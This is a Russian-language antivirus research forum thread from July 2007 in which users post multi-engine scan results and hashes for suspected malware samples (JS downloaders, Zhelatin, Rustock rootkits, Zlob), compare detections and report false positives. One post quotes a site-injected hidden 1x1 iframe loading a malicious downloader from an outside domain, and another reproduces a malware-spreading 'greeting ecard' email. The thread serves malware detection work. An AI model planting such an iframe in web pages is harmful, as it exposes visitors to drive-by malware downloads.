Исследование антивирусов 5

[Muzzle]

из темы http://virusinfo.info/showthread.php?t=11088
патченый ntoskrnl.exe

AhnLab-V3 2007.7.14.0 2007.07.17 no virus found
AntiVir 7.4.0.42 2007.07.17 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.17 no virus found
DrWeb 4.33 2007.07.18 no virus found
eSafe 7.0.15.0 2007.07.17 Suspicious Trojan/Worm
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.17 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.17 no virus found
Kaspersky 4.0.2.24 2007.07.18 Virus.Win32.Sosisko.a
McAfee 5076 2007.07.17 no virus found
Microsoft 1.2704 2007.07.17 no virus found
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.17 suspected of Embedded.SpamTool.Win32.Agent.u
VirusBuster 4.3.23:9 2007.07.17 no virus found
Webwasher-Gateway 6.0.1 2007.07.17 Win32.Malware.gen!90 (suspicious)

[Winsent]

File index.rar received on 07.18.2007 08:11:48 (CET)
Current status: finished


Antivirus Version Last Update Result

AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.17 EXP/VML-Fill.A
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
DrWeb 4.33 2007.07.18 VBS.PackFor
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 JS/WebAttacker!exploit
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 Trojan-Downloader.JS.Psyme.hu
Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.JS.Psyme.hu
Kaspersky 4.0.2.24 2007.07.18 Trojan-Downloader.JS.Psyme.hu
McAfee 5076 2007.07.17 JS/Downloader-AUD
Microsoft 1.2704 2007.07.17 TrojanDownloader:JS/Psyme.gen
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
Sophos 4.19.0 2007.07.17 Mal/ObfJS-A
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 Trojan/Downloader.vbs
VBA32 3.12.2 2007.07.17 no virus found
VirusBuster 4.3.23:9 2007.07.17 JS.Psyme.DD.Gen
Webwasher-Gateway 6.0.1 2007.07.17 Exploit.VML-Fill.A
Aditional information
File size: 3905 bytes
MD5: 7d1cc59e55db21e8599ddf9f58851fbc
SHA1: 1b4de7d587522df2325bbb1178150a2d0b6ff143

[icon]

Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
Current status: Loading ... finished
Loading server information...

Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
DrWeb 4.33 2007.07.18 VBS.PackFor
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.18 no virus found
Kaspersky 4.0.2.24 2007.07.18 no virus found
McAfee 5076 2007.07.17 no virus found
Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
Sophos 4.19.0 2007.07.17 Mal/ObfJS-A
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.17 no virus found
VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B
Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)
Aditional information
File size: 8413 bytes
MD5: 38ddab82dcea800e2545ef6f7fe2bc1b
SHA1: c87072b1b9ca09ae540d041d711c5353a1839c29

Добавлено через 4 часа 2 минуты
Из темы

File realfoto.exe received on 07.18.2007 14:07:57 (CET)
Current status: Loading ... finished
Loading server information...

Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 Win32:Small-GYA
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 Dropped:Trojan.Downloader.Small.AET
CAT-QuickHeal 9.00 2007.07.17 (Suspicious) - DNAScan
ClamAV devel-20070416 2007.07.18 no virus found
DrWeb 4.33 2007.07.18 no virus found
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3791 2007.07.18 no virus found
Ewido 4.0 2007.07.18 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.18 no virus found
Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.Win32.Small.ehu
Kaspersky 4.0.2.24 2007.07.18 no virus found
McAfee 5076 2007.07.17 Generic Downloader
Microsoft 1.2704 2007.07.18 TrojanDownloader:Win32/Agent.WX
NOD32v2 2404 2007.07.17 probably a variant of Win32/TrojanDownloader.Small.DRU
Norman 5.80.02 2007.07.18 no virus found
Panda 9.0.0.4 2007.07.18 Suspicious file
Sophos 4.19.0 2007.07.17 Mal/Packer
Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.17 Trojan.Win32.TrojanDownloader.Small.DRU
VirusBuster 4.3.23:9 2007.07.17
Webwasher-Gateway 6.0.1 2007.07.18 Packer.FSG
Aditional information
File size: 2625 bytes
MD5: ba0b2e8dc204a4b227a3b106070b76d3
SHA1: 0794eb98b6013c452c6b0a770e7a672005d91b82
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

[DVi]

Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)

DrWeb 4.33 2007.07.18 VBS.PackFor

Позволю себе усомниться в этом детекте. Все, что делает этот "вредоносный скрипт", это пишет в документ строку

Код:

<iframe src='http://bsdpng.info/error/' width=1 height=1 style='visibility: hidden;'></iframe>

, то есть является пускачом для расположенного по указанному адресу классического Psyme. Сам по себе этот скрипт безвреден. По сути, мы наблюдаем классический инжект в сайт, а DrWeb положил маску на яваскрипт-пакер. Вот такие детекты являются более правильными (хотя все равно - некорректными для статистики Вирусинфо):

Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen
Sophos 4.19.0 2007.07.17 Mal/ObfJS-A
VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B
Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)

[XL]

File ecard.exe received on 07.19.2007 21:15:51 (CET)
Current status: finished

Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.20.0 2007.07.19 no virus found
AntiVir 7.4.0.44 2007.07.19 WORM/Zhelatin.Gen
Authentium 4.93.8 2007.07.19 no virus found
Avast 4.7.997.0 2007.07.19 Win32:Tibs-BBG
AVG 7.5.0.476 2007.07.19 no virus found
BitDefender 7.2 2007.07.19 Trojan.Peed.IAM
CAT-QuickHeal 9.00 2007.07.19 (Suspicious) - DNAScan
ClamAV devel-20070416 2007.07.19 no virus found
DrWeb 4.33 2007.07.19 no virus found
eSafe 7.0.15.0 2007.07.19 Suspicious Trojan/Worm
eTrust-Vet 30.8.3794 2007.07.19 no virus found
Ewido 4.0 2007.07.19 no virus found
FileAdvisor 1 2007.07.19 no virus found
Fortinet 2.91.0.0 2007.07.19 no virus found
F-Prot 4.3.2.48 2007.07.19 no virus found
F-Secure 6.70.13030.0 2007.07.19 no virus found
Ikarus T3.1.1.8 2007.07.19 no virus found
Kaspersky 4.0.2.24 2007.07.19 no virus found
McAfee 5078 2007.07.19 no virus found
Microsoft 1.2704 2007.07.19 Trojan:Win32/Tibs.Q
NOD32v2 2408 2007.07.19 no virus found
Norman 5.80.02 2007.07.19 no virus found
Panda 9.0.0.4 2007.07.19 no virus found
Sophos 4.19.0 2007.07.17 Mal/Dorf-A
Sunbelt 2.2.907.0 2007.07.19 no virus found
Symantec 10 2007.07.19 Trojan.Packed.13
TheHacker 6.1.7.149 2007.07.18 no virus found
VBA32 3.12.2.1 2007.07.19 no virus found
VirusBuster 4.3.26:9 2007.07.19 no virus found
Webwasher-Gateway 6.0.1 2007.07.19 Worm.Zhelatin.Gen
Aditional information
File size: 139173 bytes
MD5: 765922b7967bc7b832a2a4c89dce3068
SHA1: b57ce29554bb404c236fc864cf586ca582f967fb

Седьмой KIS последнего билда тоже не детектит в режиме максимальной эвристики, хотя еще пару дней назад файлы из аналогичных писем ловились как trojan.generic
А писем такого рода приходит по 5-10 шт. в день:

Hi. School mate has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your card's direct www address below while you are connected to the Internet:

http://72.230.33.160/*****************

Or copy and paste it into your browser's "Location" box (where Internet addresses go).

We hope you enjoy your awesome card.

Wishing you the best,
Webmaster,
greetingcard.org

[Helgin]

В защиту Microsoft -)

Antivirus Version Last Update Result
AhnLab-V32007.7.20.02007.07.19no virus found
AntiVir7.4.0.442007.07.19WORM/Zhelatin.Gen
Authentium4.93.82007.07.19no virus found
Avast4.7.997.02007.07.19Win32:Tibs-BBG
AVG7.5.0.4762007.07.18no virus found
BitDefender7.22007.07.19Trojan.Peed.IAM
CAT-QuickHeal9.002007.07.19(Suspicious) - DNAScan
ClamAVdevel-200704162007.07.19 no virus found
DrWeb4.332007.07.19no virus found
eSafe7.0.15.02007.07.17Suspicious Trojan/Worm
eTrust-Vet30.8.37942007.07.19Win32/Sintun
Ewido4.02007.07.19no virus found
FileAdvisor12007.07.19no virus found
Fortinet2.91.0.02007.07.19no virus found
F-Prot4.3.2.482007.07.19no virus found
F-Secure6.70.13030.02007.07.19no virus found
IkarusT3.1.1.82007.07.19no virus found
Kaspersky4.0.2.242007.07.19no virus found
McAfee50782007.07.19no virus found
Microsoft1.27042007.07.19TrojanDropper:Win32/Tibs.O
NOD32v224072007.07.19no virus found
Norman5.80.022007.07.19no virus found
Panda9.0.0.42007.07.19no virus found
Sophos4.19.02007.07.17Mal/Dorf-A
Sunbelt2.2.907.02007.07.19no virus found
Symantec102007.07.19Trojan.Packed.13
TheHacker6.1.7.1492007.07.18no virus found
VBA323.12.2.12007.07.19no virus found
VirusBuster4.3.26:92007.07.19no virus found
Webwasher-Gateway6.0.12007.07.19Worm.Zhelatin.Gen

[mayas]

поймал ручками в \system32\drivers

File firelm01.sys received on 07.21.2007 11:37:32 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
Kaspersky 4.0.2.24 2007.07.21 Backdoor.Win32.Hackdoor.g
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.21 no virus found
NOD32v2 2410 2007.07.20 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.21 no virus found
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
Webwasher-Gateway 6.0.1 2007.07.21 no virus found

Additional information
File size: 32855 bytes
MD5: 98638f2f168f5856d11083c1f5843ba2
SHA1: 9cc547244ffaf8c4a1d43abdd2a742f47c8295cd

add:

мой пост http://virusinfo.info/showpost.php?p...&postcount=227
ошибка вирусного аналитика ЛК (я отослал в вирлаб, пришел ответ что найдено новое вредоносное программное обеспечение)а это компонент файрвола

[Макcим]

File avz00001.dta received on 07.21.2007 13:12:23 (CET)

AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
BitDefender 7.2 2007.07.21 Trojan.Rootkit.Loader.A
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 Win32/Higlieder.AI
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
Ikarus T3.1.1.8 2007.07.21 Trojan.Rootkit.Loader.A
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.21 VirTool:WinNT/Higlieder.E
NOD32v2 2410 2007.07.20 Win32/Bagle.IX
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen (suspicious)

[Muffler]

File bcqr00001.dat received on 07.21.2007 21:25:06 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.21 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 RKRustok.A
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock.gen!C
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.21 Rootkit/NetFrame
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen!82 (suspicious)

Additional information
File size: 61114 bytes
MD5: 8c1d95da9e9085b8c2b13556b3dd95d3
SHA1: 28a2dce0dfd8355c5f011c6c0ab03e2df1bb896e
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

Добавлено через 3 часа 21 минуту
File avz00002.dta received on 07.22.2007 00:45:31 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.21 TR/Rootkit.Gen
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 Win32:Trojan-gen. {Other}
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.21 Backdoor.Rustock.B
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 Win32.Rustock.B
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 Rootkit.Small
FileAdvisor 1 2007.07.22 no virus found
Fortinet 2.91.0.0 2007.07.21 W32/RUSTOCK.AM!tr.bdr
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
Ikarus T3.1.1.8 2007.07.21 Backdoor.Rustock.B
Kaspersky 4.0.2.24 2007.07.22 no virus found
McAfee 5079 2007.07.20 Spam-Mailbot.c!Rootkit
Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.22 Trj/Clicker.WM
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock
Symantec 10 2007.07.22 Backdoor.Rustock.B
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
Webwasher-Gateway 6.0.1 2007.07.22 Trojan.Rootkit.Gen

Additional information
File size: 80488 bytes
MD5: 95a506f62ce73818fa6e27d1c052b711
SHA1: 6d880bc775e46e0a26859003dcfb44b26e076276
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

[Winsent]

File 1.exe received on 07.22.2007 10:10:16 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.21 HEUR/Malware
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.22 Win32elf-CAT
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.22 no virus found
CAT-QuickHeal 9.00 2007.07.20 (Suspicious) - DNAScan
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.22 no virus found
Fortinet 2.91.0.0 2007.07.22 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
Ikarus T3.1.1.8 2007.07.22 Trojan-PWS.Win32.Kapod
Kaspersky 4.0.2.24 2007.07.22 no virus found
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.22 no virus found
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.22 Suspicious file
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious
Symantec 10 2007.07.22 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
Webwasher-Gateway 6.0.1 2007.07.22 Heuristic.Malware


Additional information
File size: 264192 bytes
MD5: 849f0a1fcbfc7752368131947228790d
SHA1: 33d8313e504f36cbd8a45ea1de5a92d50b95c37f
packers: ASProtect
packers: PE_Patch, Aspack
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

[kvit]

Antivirus Version Last Update Result
AhnLab-V3 2007.7.25.0 2007.07.24 no virus found
AntiVir 7.4.0.44 2007.07.24 no virus found
Authentium 4.93.8 2007.07.25 no virus found
Avast 4.7.997.0 2007.07.25 Win32:Trojan-gen. {Other}
AVG 7.5.0.476 2007.07.25 Downloader.Zlob.HN
BitDefender 7.2 2007.07.25 Trojan.Downloader.Zlob.AAEE
CAT-QuickHeal 9.00 2007.07.24 no virus found
ClamAV devel-20070416 2007.07.25 no virus found
DrWeb 4.33 2007.07.25 no virus found
eSafe 7.0.15.0 2007.07.24 no virus found
eTrust-Vet 31.1.5003 2007.07.24 no virus found
Ewido 4.0 2007.07.24 no virus found
FileAdvisor 1 2007.07.25 no virus found
Fortinet 2.91.0.0 2007.07.25 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
F-Secure 6.70.13030.0 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn
Ikarus T3.1.1.8 2007.07.24 no virus found
Kaspersky 4.0.2.24 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn
McAfee 5081 2007.07.24 no virus found
Microsoft 1.2704 2007.07.25 TrojanDownloader:Win32/Zlob
NOD32v2 2418 2007.07.25 no virus found
Norman 5.80.02 2007.07.24 DNSChanger.gen10
Panda 9.0.0.4 2007.07.24 no virus found
Sophos 4.19.0 2007.07.17 Mal/Zlob-A
Sunbelt 2.2.907.0 2007.07.25 no virus found
Symantec 10 2007.07.25 no virus found
TheHacker 6.1.7.152 2007.07.23 no virus found
VBA32 3.12.2.1 2007.07.24 no virus found
VirusBuster 4.3.26:9 2007.07.24 no virus found
Webwasher-Gateway 6.0.1 2007.07.25 no virus found

Добавлено через 2 минуты
+ тоже самое с сайта Касперского

Проверенный файл: setup.exe - Инфицирован

setup.exe/stream/Script - в порядке
setup.exe/stream/data0001 - в порядке
setup.exe/stream/data0002 - в порядке
setup.exe/stream/data0003 - в порядке
setup.exe/stream/data0004 - в порядке
setup.exe/stream/data0005 - в порядке
setup.exe/stream/data0006 - инфицирован Trojan-Downloader.Win32.Zlob.bxn
setup.exe/stream/data0007 - в порядке
setup.exe/stream/data0008 - в порядке

[Muffler]

File svc.exe received on 07.26.2007 06:25:17 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.26.0 2007.07.25 no virus found
AntiVir 7.4.0.50 2007.07.25 HEUR/Crypted
Authentium 4.93.8 2007.07.25 no virus found
Avast 4.7.997.0 2007.07.26 no virus found
AVG 7.5.0.476 2007.07.25 no virus found
BitDefender 7.2 2007.07.26 no virus found
CAT-QuickHeal 9.00 2007.07.25 (Suspicious) - DNAScan
ClamAV 0.91 2007.07.26 no virus found
DrWeb 4.33 2007.07.26 no virus found
eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 no virus found
Ewido 4.0 2007.07.25 no virus found
FileAdvisor 1 2007.07.26 no virus found
Fortinet 2.91.0.0 2007.07.26 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
F-Secure 6.70.13030.0 2007.07.26 no virus found
Ikarus T3.1.1.8 2007.07.25 no virus found
Kaspersky 4.0.2.24 2007.07.26 no virus found
McAfee 5083 2007.07.26 no virus found
Microsoft 1.2704 2007.07.25 no virus found
NOD32v2 2421 2007.07.26 no virus found
Norman 5.80.02 2007.07.25 no virus found
Panda 9.0.0.4 2007.07.26 Suspicious file
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.26 no virus found
Symantec 10 2007.07.26 no virus found
TheHacker 6.1.7.153 2007.07.25 no virus found
VBA32 3.12.2.1 2007.07.24 suspected of Embedded.Trojan-Downloader.Win32.Small.dge
VirusBuster 4.3.26:9 2007.07.25 no virus found
Webwasher-Gateway 6.0.1 2007.07.26 Win32.NewMalware.BA!4538!2

Additional information
File size: 4538 bytes
MD5: a5da3a9c3b0e2b5034b3ec49cbb3a60f
SHA1: 2dca577caf641a2b4e3972902b65b7b1342fab34

[Kuzz]

http://virusinfo.info/showthread.php?t=11350

Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 PSW.Generic4.ZKV
BitDefender 7.2 2007.07.26 MemScan:Trojan.Spy.Nuklus.D
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 VirTool:Win32/Obfuscator.C
NOD32v2 2423 2007.07.26 a variant of Win32/Spy.Nuklus
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 Suspicious file
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 9216 bytes
MD5: b1682db94c7ab7bb53aa90d67df72d42
SHA1: c24da5e473abc41954347b406c9ea84754241c38
packers: UPack

Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 BDS/Afcore.cb.2.B
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 -
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 -
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 58880 bytes
MD5: 4b137cb5b8291dc7d71de53299826db5
SHA1: 1a21926475389802039e4943cf2060921c11997a
packers: UPX
packers: UPX
packers: UPX

[Muffler]

File _________________________________ received on 07.26.2007 16:57:15

Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
